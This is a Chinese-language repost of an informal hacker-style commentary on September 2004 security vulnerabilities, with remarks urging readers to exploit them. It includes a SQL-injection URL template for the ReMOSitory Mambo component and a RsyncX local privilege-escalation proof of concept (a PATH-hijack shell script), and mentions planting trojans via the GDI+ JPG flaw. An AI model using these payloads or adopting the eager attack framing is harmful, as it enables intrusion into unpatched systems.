软件工程

本类阅读TOP10

·PHP4 + MYSQL + APACHE 在 WIN 系统下的安装、配置
·Linux 入门常用命令(1)
·Linux 入门常用命令(2)
·使用 DCPROMO/FORCEREMOVAL 命令强制将 Active Directory 域控制器降级
·DirectShow学习(八): CBaseRender类及相应Pin类的源代码分析
·基于ICE方式SIP信令穿透Symmetric NAT技术研究
·Windows 2003网络负载均衡的实现
·一网打尽Win十四种系统故障解决方法
·数百种 Windows 软件的免费替代品列表
·收藏---行百里半九十

分类导航
VC语言Delphi
VB语言ASP
PerlJava
Script数据库
其他语言游戏开发
文件格式网站制作
软件工程.NET开发
9月安全漏洞

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站

◆ Apache Web Server远程IPv6缓冲区溢出漏洞

截止,我发表这个章子之前,凹是没拿到利用程序,找了几个要IPV6模拟数据包构造的程序,没人搞这块,这几天收集一下,兰州大学o3那一组01年开始搞IPV6,并且有个实验网,问问他内部消息,GO ,GO ,GO
 
◆ Apache Mod_DAV LOCK远程拒绝服务漏洞

点进去就知道,咋利用了,也GO,GO,GO
 
◆ ReMOSitory Server远程SQL注入漏洞

http://[target]/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*   国内用的还是少,不过有Mambo Open Source的,用以上URL构造,就可以达成注入攻击


 
◆ Google工具栏'About'跨站脚本执行漏洞

跨站,是实在搞不定,再搞,有写WEB利用脚本那会工夫,木马都杀进去几个了,看看也好,举一反三
 
◆ RsyncX本地权限提升漏洞

建立如下内容的~/bin/defaults文件:

=============================
#!/bin/sh                                                                      
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

然后在用户路径的~/bin中运行RsyncX :

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

 
◆ FreeBSD本地内核缓冲区溢出漏洞

这东西有用,搜索了http://www.securityfocus.com/   没找到攻击程序

◆ Microsoft Windows GDI+ JPG解析组件缓冲区溢出漏洞

yahoo.com,N写日子前就是被这块漏洞所破坏,构造木马程序写入JPG文件,怪他自己吧,发布了这么长时间,
YAHOO的安全顾问也没补,http://www.cert.org.cn/articles/vulnerability/common/2004091521909.shtml
这是国家安全应急中心发布的漏洞,描述和资料

◆ Apache mod_ssl反向代理SSL远程缓冲区溢出漏洞
最近的apache漏洞都很多,很多EXP都没有响应的效果,不能得到ROOT




相关文章

相关软件